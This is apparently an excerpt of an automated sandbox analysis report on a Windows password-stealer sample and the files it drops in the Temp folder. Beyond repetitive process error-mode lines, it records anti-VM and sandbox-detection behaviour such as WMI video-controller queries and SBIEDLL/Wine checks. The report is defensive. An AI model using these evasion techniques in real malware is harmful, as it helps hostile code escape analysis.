                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe PID: 432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: spczxf.exe PID: 2908, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ohvrxt.exe PID: 1384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hgzxhw.exe PID: 3660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: utntwb.exe PID: 5788, type: MEMORYSTR
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1666528793.0000016E9B268000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1666528793.0000016E9AD6A000.00000004.00000800.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1736044836.000001A4B2722000.00000004.00000800.00020000.00000000.sdmp, ohvrxt.exe, 00000014.00000002.2223610242.000001B044693000.00000004.00000800.00020000.00000000.sdmp, hgzxhw.exe, 00000015.00000002.2341667196.00000292640E2000.00000004.00000800.00020000.00000000.sdmp, utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1666528793.0000016E9B268000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1666528793.0000016E9AD6A000.00000004.00000800.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1736044836.000001A4B2722000.00000004.00000800.00020000.00000000.sdmp, ohvrxt.exe, 00000014.00000002.2223610242.000001B044693000.00000004.00000800.00020000.00000000.sdmp, hgzxhw.exe, 00000015.00000002.2341667196.00000292640E2000.00000004.00000800.00020000.00000000.sdmp, utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory allocated: 16E992A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory allocated: 16EB2C90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 1620000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 7F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 7540000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 9F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: BF60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: C350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 7F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 9F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 7F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: E350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 11350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 11B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 14B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 16B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory allocated: 1A4B0B30000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory allocated: 1A4CA6C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory allocated: 1B042790000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory allocated: 1B05C1D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory allocated: 292623F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory allocated: 2927BDB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: E10000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2AF0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2920000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory allocated: 1BC8E820000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory allocated: 1BCA81C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeMemory allocated: 7D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeMemory allocated: 22F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeMemory allocated: 900000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeMemory allocated: BC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeMemory allocated: 2510000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeMemory allocated: 4510000 memory reserve | memory write watch
